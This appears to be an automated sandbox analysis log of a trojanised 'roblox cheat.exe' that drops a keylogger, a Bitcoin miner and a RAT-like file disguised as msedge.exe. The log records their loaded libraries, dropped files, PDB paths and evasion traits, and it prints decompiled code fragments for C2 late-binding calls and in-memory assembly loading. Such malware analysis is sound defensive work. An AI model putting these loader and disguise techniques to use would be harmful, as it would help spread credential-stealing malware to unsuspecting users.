            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeSection loaded: pcacli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: ndfapi.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: wdi.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: duser.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: atlthunk.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: ndfapi.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: wdi.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: ndfapi.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: wdi.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: windows.shell.servicehostbuilder.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: policymanager.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: msvcp110_win.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: pcacli.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: winbrand.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeAutomated click: OK
            Source: C:\Windows\System32\cmd.exeAutomated click: OK
            Source: C:\Windows\System32\cmd.exeAutomated click: OK
            Source: C:\Windows\System32\cmd.exeAutomated click: OK
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\roblox cheat.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: roblox cheat.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: roblox cheat.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
            Source: roblox cheat.exeStatic file information: File size 6410752 > 1048576
            Source: roblox cheat.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x60fc00
            Source: roblox cheat.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: roblox cheat.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: C:\buildAgent\work\ci_deploy_ninja_boot-x86_git\build.ninja\common\vs2019\x86\release\Installer\Windows\RobloxPlayerInstaller.pdb source: roblox cheat.exe, robloxPX1instaler.exe.0.dr
            Source: Binary string: \rat\BitJoiner\payload\obj\Debug\payload.pdb source: roblox cheat.exe
            Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb source: roblox cheat.exe, cheatinstaler cheatinstalerF6R54T.exe.0.dr
            Source: Binary string: zserialNumbersignatureissuervaliditysubjectissuerUIDsubjectUIDextensionsX509_CINFcert_infosig_algX509CERTIFICATEcompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -Oy- -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASM source: roblox cheat.exe, robloxPX1instaler.exe.0.dr
            Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -Oy- -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASM source: roblox cheat.exe, robloxPX1instaler.exe.0.dr
            Source: Binary string: serialNumbersignatureissuervaliditysubjectissuerUIDsubjectUIDextensionsX509_CINFcert_infosig_algX509CERTIFICATEcompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -Oy- -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASM source: robloxPX1instaler.exe, 00000002.00000002.3209096331.0000000000D68000.00000002.00000001.01000000.00000006.sdmp, robloxPX1instaler.exe, 00000002.00000000.1344820205.0000000000D68000.00000002.00000001.01000000.00000006.sdmp

            Data Obfuscation

            barindex
            .NET source code contains method to dynamically call methods (often used by packers)
            Source: BitCoin_miner.exe.3.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: BitCoin_miner.exe.3.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: Keyloger.exe.3.dr, girTRrhIQMQcVyDbxuRrxGQG7zNOoB.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{w3NlLrUpwn05JMopXTd8mSE7UP5bcp._9YAUzJ19chMfqFNJ6TCoEOI8QxrQHh,w3NlLrUpwn05JMopXTd8mSE7UP5bcp.YxYN6QWQIWu5XVAci3urjI00UEnFJ7,w3NlLrUpwn05JMopXTd8mSE7UP5bcp.CCtpPZimJrMU8onPEHRRYLPAiv05nO,w3NlLrUpwn05JMopXTd8mSE7UP5bcp.MfOa5980QCPNnU9x3V9dVBMB71uRJj,dtVFTVK0Ux3SN1R.iCtkLrztKkZDBFY()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: Keyloger.exe.3.dr, girTRrhIQMQcVyDbxuRrxGQG7zNOoB.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{N3zhZ0gcLgaQW9k[2],dtVFTVK0Ux3SN1R.By4JChD42wKAESJEe0khbaDthCWknJS4g49dw5i7eJRFccFB(Convert.FromBase64String(N3zhZ0gcLgaQW9k[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: msedge.exe.3.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: msedge.exe.3.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            .NET source code contains potential unpacker
            Source: BitCoin_miner.exe.3.dr, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
            Source: BitCoin_miner.exe.3.dr, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
            Source: BitCoin_miner.exe.3.dr, Messages.cs.Net Code: Memory
            Source: Keyloger.exe.3.dr, girTRrhIQMQcVyDbxuRrxGQG7zNOoB.cs.Net Code: LT2zntgXTGjsdzj2afFrTKkcoonKiN System.AppDomain.Load(byte[])
            Source: Keyloger.exe.3.dr, girTRrhIQMQcVyDbxuRrxGQG7zNOoB.cs.Net Code: PBtLR1iSSO49jTq System.AppDomain.Load(byte[])
            Source: Keyloger.exe.3.dr, girTRrhIQMQcVyDbxuRrxGQG7zNOoB.cs.Net Code: PBtLR1iSSO49jTq
            Source: msedge.exe.3.dr, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
            Source: msedge.exe.3.dr, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
            Source: msedge.exe.3.dr, Messages.cs.Net Code: Memory
            Source: robloxPX1instaler.exe.0.drStatic PE information: 0xADBEC9FB [Mon May 15 23:38:35 2062 UTC]
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeFile created: C:\Users\user\AppData\Local\Temp\__tmp_rar_sfx_access_check_6945218Jump to behavior
            Source: cheatinstaler cheatinstalerF6R54T.exe.0.drStatic PE information: section name: .didat
            Source: cheatinstaler cheatinstalerF6R54T.exe.0.drStatic PE information: section name: _RDATA
            Source: C:\Users\user\Desktop\roblox cheat.exeCode function: 0_2_01A5B6FF push edi; retn 0000h0_2_01A5B701
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeCode function: 2_2_00D13175 push ecx; ret 2_2_00D13188
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF754585166 push rsi; retf 3_2_00007FF754585167
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF754585156 push rsi; retf 3_2_00007FF754585157
            Source: Keyloger.exe.3.dr, albqjOvwCQYLvRXxiGyhIpdY44vi5RLlo7VzM72FUP7qbNEq.csHigh entropy of concatenated method names: '_4MOkoXT607b9ZVv18hCOaQeksKQK1QY2Z59Hgn3vnGNBTDWY', 'aoVp1bvo8BQemLHmXPz6S0y0KAL2MZMS1pG20J1rmkO1yH36', 'yAFN5ozhCBuI45z4NTpIpiKfB19pUh9mAx6dQVO83WEQzG9S', '_1ORCLm148GvAasbvzvKe0j3op', 'xz4IVJsbdqQjT3fvrAzMqnpUJ', 'd5IEku84RPpe3jqqxUoOxlid9', 'baJVbebdBRSG0vXeqpQbaFGhF', 'PdROi8GC1qEzGAZ3jL0JM4kS1', '_4vWYxVH7giIuQNZUquEn1HcOH', 'iweLYuR0sjls7DY5DlgNakVEM'
            Source: Keyloger.exe.3.dr, qPFRCBxxevtOrm6kkA6S3T0BVLfQqKPGErYWluL1k515NkyAjTBIKTN89KogayXJPuAweWS9osecqggfc7KqoqU1.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'OvBZh7NuYxNyoawDWVgb1bvQvny4ey9hxzXnZmUKYwMyHV3G', 'D1pK9yah6bW1RSKhi0bojd7k0gErawVt3UAqXVftOOGZ8Ek7', 'Amz2GUO9F3xqCrSqrojRM1z27y3P33TQxbcBuP2jeOuVoQ0I', 'XrVGbup25w9XJj82jHd5OO6JqCynsc4QvmRbz66DPHV276dk'
            Source: Keyloger.exe.3.dr, tMXwX3tWlMuOZgJ.csHigh entropy of concatenated method names: 'LjeIsJHhRum59xL', '_6RsfQAJJYyt0J9HkPqIBAQeU380h3KOSQt3dHGv6rcNETpFQfgCb6boQcTnPkAwvsrPG8NTTAwKpmugXZhP', 'zaWTERDp5aT0SDSKgqc0pwq0a7ceYdFVq33bH5rm90KOgrgYcf23ikS2yDHBmgzl4t2KKfhUgFaKblNJ5k3', 'sWVdXUK0j8UTqkeKJ34zN69ydPubFvVaflAAl1XEpkV2r1QsYGAgJphVMO9CuJcZXSLKFk9ZU4EZ9kNpbPz', 'lFKVqnfF4sk3NIn44QcIBHZEg'
            Source: Keyloger.exe.3.dr, V2Dstkpoa4KAEaCoYXeMa7Hkw0t8Bq.csHigh entropy of concatenated method names: '_0c5jTYhRyonOUDziLx9bjo6xsSexAe', '_25wKNHm120NsmF8qQvTNtHz3RfwaXK', 'viLdoQDOYFFpv6KJ7CRK3qfhhqjyZ8', 'oyu0xUeMkLUDSGAbVhHha949466V1K', 'Vl9igX7Uc5X0UR61FqWGnXY9OhKp3l', '_5AqL7zP7f68dYFzd47NqgQFLffkmOs', 'HrBKo0STAWa5C612O2nnGfOgnFiJTT', 'EZ9n76FqTYmhSSOefwFVuL5ThwtwlO', 'E14zUxLx5YeoVLmDYLzZ6cZw9IN0jq', 'zBGEheUMvhUAXOJ5xyiI8x2n5H3mDM'
            Source: Keyloger.exe.3.dr, dtVFTVK0Ux3SN1R.csHigh entropy of concatenated method names: '_7YMtWoQN5HfGCSK', 'OkqS6ol8M17XMmP', 'uNW6GrfQGz1M2XM', 'Ii6cHrN7BYLDzEF', '_5aJsNyLDXOhokOb', '_9vn0AlUd8GUTBri', 'JvICn3rRI6iioCk', 'UWKlns5zDZ2WYha', '_7hsyClPI7F56lLF', 'oG7pcy3sU6P1wO9'
            Source: Keyloger.exe.3.dr, girTRrhIQMQcVyDbxuRrxGQG7zNOoB.csHigh entropy of concatenated method names: 'yz3ulHWN9n14oJZA9i5vmrxphpzaCp', 'LT2zntgXTGjsdzj2afFrTKkcoonKiN', 'RVfS3lUZ13RpRJx', '_36yQU5duIkCbW2T', 'xm86z0xRhaJxcNt', 'meydQmflaU7lI44', 'ulkLjOcP0yxW7UI', 'b6Kn4aSdInWG889', 'buvrIstkF8NGBRb', 'YEEc5g9ZTXWiw5i'
            Source: Keyloger.exe.3.dr, 3hMB2la9XyjPtIBDiudYxRNIVlJFvm.csHigh entropy of concatenated method names: 'LfvVtvqV46cUkGAPMYI4VquR3SMv2D', 'vIoAF5cBXshvrNilb2DuPcULPAXNvn', 'kA8SgQYodhg33g9XqJGDIcdyDuU2eq', 'lQv3wZATHx75FgR1TEYl60evq1ah4O', 'PSUdXouR3XnWp7uzoDx9bmHtKpUEQn', 'hianEuAU3qLDiz0mgrS8dJ9EtIpg4FKSm', '_1Uzw1Jv75GWN68eZuqAFXHg859jSuA3VZ', 'Nm7Liat39gbXWFp1qqe6HHX35VDFiL7Da', 'i9EMzetgnoZiy3VF71knEPeukHZBiLL2k', 'jUtPhbUZdmJ9iBO2Yt3x7WmdMEVCHS7NK'
            Source: Keyloger.exe.3.dr, WPBnCaT3d8cYQmg.csHigh entropy of concatenated method names: 'XqbpRmwJ4LtIvAR', 'P0jTCqOar3cv9vv', 'cQ4yWoyO6QI0787', '_9bNc4FZpvPn2d8N', 'tSubarXMNHmpIgk', '_0QpL3D9FsZYYURB', 'e12J0P1bomhydt6', 'a8HR9xsSDvlWrSZ', 'fkNSnoNe84RdGzT', 'De6iaF9HVBWEBkc'
            Source: Keyloger.exe.3.dr, R0AwzNAU4OLQBy5.csHigh entropy of concatenated method names: '_8DVPMgIt5LmyReW', 'BZVAT9UWtB9Y41EBslDUkcaMcEz93wnp4TwFdsJAwNlh5HH3J22aeHQ4iYM26w4Bz', 'xRvMGytdQ2t0vvaBZmUAw8zGZw6lREIjCy8Hi0yW4uNgQnuaYaSOw4QBYq6OZfOm6', 'YZHXocKFTuIAqCnIKSsaOe8Bu7xKEX61eFFh0gCYv1doZqxiACFmQx8wx0U5Tmaxw', 'KseJ4CZxDxgasaIvvghOQYUtjhm1qNwU5KPV4WJnB97il4HcI4MBrgr30GaNE3nxx'
            Source: Keyloger.exe.3.dr, tUULgqwzOy3tsY4.csHigh entropy of concatenated method names: 'XyjKcb0SD0Rnsly', 'onnajoto1IWR83c', '_4JRwDCvuPsxAFxT', 'TUfvtJiSrFTFqfO', 'hKn7O9jilUma2Zw0Est6bw1gkRujD0aPP8Houzr8kpBXX8Is19SryYZ18XrIvaHfPSx1xl3SMjVYx3EGcSp', 'h4RQD1MY3oKURj7ED4KIYRKHKVX617yrfjpvxqbClLGSMVnQNaxibqcg3p41qk3VHfmtekuu5XcduvTUIrL', '_0W2Q7XRDNANGyYK7eYQ1CBoe0T8xbd2SwsQUxdTTxt63ViT6oSnfQrQtDAtoh5P5JHq9VyPg2PLPvvUYpYy', 'qDu4N9S6yNJjuF2IyC1Dipv55nveXbngGs3oU5y97y0gm1zMrkqsSs3csriArDoT7m4uVmnmZE7RcOPNSr2', 'XAGEDgUZ2PI2TXU92O0Frre9DggfBwEZw8SBXJzLTqRAXOPeOXIvKsXXvekl5fCqtfggq9yas1x0W6UAKyW', '_2yOrKM1R5TZHaIoRlmRHTfmfg0sAWQFAnGRUnIyLkL8leSVsnLbKF2mAFPNh8FY82TUpGr5X3XvinrE8GQD'
            Source: C:\Users\user\Desktop\roblox cheat.exeFile created: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeFile created: C:\Users\user\AppData\Local\Temp\ msedge.exeJump to dropped file
            Source: C:\Users\user\Desktop\roblox cheat.exeFile created: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeFile created: C:\Users\user\AppData\Local\Temp\Keyloger.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeFile created: C:\Users\user\AppData\Local\Temp\BitCoin_miner.exeJump to dropped file
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Tries to detect virtualization through RDTSC time measurements
